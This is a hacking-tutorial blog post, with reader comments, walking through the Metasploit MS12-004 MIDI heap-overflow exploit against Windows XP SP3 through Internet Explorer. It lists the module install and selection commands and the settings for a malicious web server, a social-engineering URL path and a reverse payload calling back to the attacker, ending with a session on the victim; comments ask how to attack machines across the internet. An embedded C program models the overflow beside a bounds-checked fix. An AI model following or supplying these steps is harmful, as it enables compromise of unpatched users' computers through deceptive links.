4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow



Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3

Vulnerable Application : Windows Multimedia Library (winmm.dll)

Exploit Credits : Shane Garrett, Juan Vazquez, Sinn3r

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability is triggered while parsing a specially crafted MIDI file, and remote code execution is reached through Windows Media Player's ActiveX control in Internet Explorer.

Exploitation is done by supplying a specially crafted MIDI file with specific events that make the offset calculation exceed what was allocated on the heap (a 0x400-byte buffer allocated by WINMM!winmmAlloc). The out-of-bounds access only lets the attacker "inc al" or "dec al" a single byte, but that is enough to corrupt an array (CImplAry) set up beforehand and make the browser confuse the types of tagVARIANT objects, which is turned into remote code execution in the context of the logged-on user.

At the time of writing, the IE 8 target requires the JRE (Java Runtime Environment) to be installed on the victim in order to bypass DEP (Data Execution Prevention).

Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
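To make the bug class in that description concrete, the following C program is an added example written for this page; it is not code from winmm.dll, from the Metasploit module, or from the exploit authors. It models a MIDI player that keeps a 0x400-byte table of per-channel, per-note "note sounding" counters, increments one on Note On and decrements it on Note Off, and uses the note byte read from the file as the index. The table layout (8 tracked channels x 128 one-byte counters), the index formula and the sample file are assumptions of the model, not the real winmm layout or the module's crafted MIDI. The vulnerable handler sits beside a hardened one that enforces the 7-bit range of MIDI data bytes, a minimal Standard MIDI File walker feeds both the same constructed file whose third event carries a note byte of 0xFF, and guard bytes placed after the table make the out-of-bounds increment observable without undefined behaviour.

```c
/* Model of the MS12-004 bug class. Added example: not winmm.dll, Metasploit or exploit-author code.
 * A player keeps 0x400 one-byte "note sounding" counters, bumps one on Note On, drops it on Note Off,
 * and indexes the table with the note byte read from the file. Layout and index formula are assumed. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define TABLE_SIZE 0x400   /* the winmmAlloc(0x400) buffer the page describes */
#define SLACK      0x100   /* guard bytes after the table keep the overflow observable and defined */
#define BE32(p) ((uint32_t)(p)[0] << 24 | (uint32_t)(p)[1] << 16 | (uint32_t)(p)[2] << 8 | (p)[3])
typedef struct { uint8_t status, note, velocity; } midi_event;
typedef int (*handler_fn)(uint8_t *table, const midi_event *ev);

/* Assumed layout: 8 tracked channels x 128 notes. A note byte of 0x80..0xFF lands up to 0x7F past the end. */
static size_t note_index(const midi_event *ev) { return (size_t)(ev->status & 7) * 0x80 + ev->note; }

/* Vulnerable handler: trusts the note byte. Returns the index written, -1 for events it ignores. */
static int poly_event_vuln(uint8_t *table, const midi_event *ev) {
    uint8_t kind = ev->status & 0xF0;
    if (kind != 0x90 && kind != 0x80) return -1;
    size_t idx = note_index(ev);
    if (kind == 0x90 && ev->velocity) table[idx]++;   /* "inc al": note on */
    else table[idx]--;                                /* "dec al": note off, or velocity-0 note on */
    return (int)idx;
}
/* Hardened handler: MIDI data bytes are 7-bit, so a larger one is rejected (-2) before it can become an
 * index; the index is bounds-checked anyway (-3). Otherwise identical behaviour. */
static int poly_event_fixed(uint8_t *table, const midi_event *ev) {
    if (ev->note > 0x7F || ev->velocity > 0x7F) return -2;
    if (note_index(ev) >= TABLE_SIZE) return -3;
    return poly_event_vuln(table, ev);
}
/* Variable-length quantity: 7 bits per byte, high bit set means another byte follows. */
static uint32_t read_vlq(const uint8_t *d, size_t *q, size_t end) {
    uint32_t v = 0, b;
    for (int n = 0; *q < end && n < 4; n++) {
        b = d[(*q)++]; v = (v << 7) | (b & 0x7F);
        if (!(b & 0x80)) break;
    }
    return v;
}
/* Minimal Standard MIDI File walker (header, MTrk chunks, delta times, running status, meta/sysex).
 * Channel-voice events reach `h` unvalidated. Returns the handler's last result, -1 on a structural
 * error, and stops as soon as the handler rejects an event. */
static int walk_smf(const uint8_t *d, size_t len, handler_fn h, uint8_t *table) {
    if (len < 14 || memcmp(d, "MThd", 4) != 0) return -1;
    int rc = -1;
    for (size_t p = 8 + BE32(d + 4), end = 0; p + 8 <= len; p = end) {
        size_t q = p + 8; end = q + BE32(d + p + 4);
        if (end > len) return -1;
        if (memcmp(d + p, "MTrk", 4) != 0) continue;      /* unknown chunk type: skip it */
        for (uint8_t status = 0; q < end;) {
            read_vlq(d, &q, end);                         /* delta time, not needed here */
            if (q >= end) return -1;
            uint8_t b = d[q];
            if (b == 0xFF || b == 0xF0 || b == 0xF7) {    /* meta or sysex: skip the payload */
                q += (b == 0xFF) ? 2 : 1;
                uint32_t n = read_vlq(d, &q, end);
                if (n > end - q) return -1;
                q += n; continue;
            }
            if (b & 0x80) { status = b; q++; }            /* new status byte */
            else if (!status) return -1;                  /* data byte with no running status */
            int ndata = ((status & 0xF0) == 0xC0 || (status & 0xF0) == 0xD0) ? 1 : 2;
            if (q + ndata > end) return -1;
            midi_event ev = { status, d[q], ndata == 2 ? d[q + 1] : 0 };
            q += ndata;
            if ((rc = h(table, &ev)) < -1) return rc;     /* handler rejected the event: stop */
        }
    }
    return rc;
}
/* Constructed format-0 file (not the module's): middle C on/off on channel 0, then a Note On on
 * channel 7 whose note byte is 0xFF, which no conforming MIDI writer emits. */
static const uint8_t crafted_smf[] = {
    'M','T','h','d', 0,0,0,6, 0,0, 0,1, 0,0x60,     /* format 0, one track, 96 ticks per quarter */
    'M','T','r','k', 0,0,0,0x10,                   /* track chunk holding 16 bytes of events */
    0x00, 0x90, 0x3C, 0x40,   /* delta 0:    ch0 note 0x3C on           -> idx 0x03C */
    0x60, 0x80, 0x3C, 0x40,   /* delta 0x60: ch0 note 0x3C off          -> idx 0x03C */
    0x00, 0x97, 0xFF, 0x40,   /* delta 0:    ch7 note 0xFF on (crafted) -> idx 0x47F */
    0x00, 0xFF, 0x2F, 0x00,   /* end of track */
};
/* Runs the file through `h` against a fresh table followed by SLACK guard bytes (0xAA). Returns how
 * many guard bytes changed, i.e. bytes written past the 0x400-byte table; last result via last_rc. */
int play_file(handler_fn h, int *last_rc) {
    uint8_t *buf = calloc(TABLE_SIZE + SLACK, 1);
    if (!buf) return -1;
    memset(buf + TABLE_SIZE, 0xAA, SLACK);
    int rc = walk_smf(crafted_smf, sizeof crafted_smf, h, buf), corrupted = 0;
    for (size_t i = 0; i < SLACK; i++) corrupted += buf[TABLE_SIZE + i] != 0xAA;
    free(buf);
    if (last_rc) *last_rc = rc;
    return corrupted;
}
int last_rc_for(handler_fn h) { int rc = 0; play_file(h, &rc); return rc; }

int main(void) {
    printf("vulnerable: last index 0x%x, guard bytes hit %d\n", last_rc_for(poly_event_vuln), play_file(poly_event_vuln, NULL));
    printf("hardened:   last rc %d, guard bytes hit %d\n", last_rc_for(poly_event_fixed), play_file(poly_event_fixed, NULL));
    return 0;
}
```

Build the saved file with gcc -std=c99 -Wall. The vulnerable handler ends on index 0x47F and changes one guard byte, the single inc al the description refers to; the hardened handler returns -2 for the crafted event and leaves the guard untouched. The same check belongs in any parser that turns a MIDI data byte into an index: the status byte tells you the event type, but nothing in the file format guarantees that the high bit of a data byte is clear.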

Requirements :

1. Metasploit Framework (Windows/Linux)

2. The ms12_004_midi.rb exploit module (download link)

Step by Step :

Attacker IP Address :

Victim IP Address :

1. Download the exploit module linked above and copy it into the Metasploit browser-exploit module directory with the following command:

cp ms12_004_midi.rb /pentest/exploits/framework/modules/exploits/windows/browser/

2. Start the Metasploit Framework with the msfconsole command and select the module you added in step 1 (the module path follows from the directory and file name: use exploit/windows/browser/ms12_004_midi).

3. Next, run the show options command to list the module's settings. The example below shows only the settings that matter for getting the exploit to run without problems.

Information :

set srvhost <attacker IP> --> address the exploit's web server binds to (the attacker's IP address)

set srvport 80 --> local port the web server listens on for the victim's connection

set uripath christmas-song --> path of the malicious URL; pick something that makes a believable social-engineering link

set lhost <attacker IP> --> address the reverse payload connects back to (the attacker's IP address)

set lport 443 --> local port that receives the payload connection from the victim

exploit --> starts the server; the console prints the link to send to the victim

4. When the victim opens the malicious link, our BackTrack console shows a new active session and we have access to their computer 🙂


Countermeasures :

1. Keep Windows updated; this vulnerability is fixed by the MS12-004 security update. If you are still using Windows XP, migrate to Windows 7.

Hope you enjoyed 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com


  • osettobubu


    Everything works great... the only thing is that, as we can see, it is all done on the local LAN, on localhost. It would be nice to do it from OUTSIDE, that is from a remote PC towards another IP, but the problem seems to be how to bypass the router to get into the LAN and see the PCs?

    • v4L

      Sorry, I can't write in Italian 😀 You can refer to my tutorial here about how to hack from the WAN: http://www./computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

    • Reginald Melorius Please

      No, you cannot do that from the internet because of the router/firewall that, as you guessed, would very likely block the incoming packets.


  • aric

    Download the SecurityTube Metasploit Framework Expert DVD for FREE. Enjoy 😉 securitytube-training.com/certifications/securitytube-metasploit-framework-expert/?id=download 😉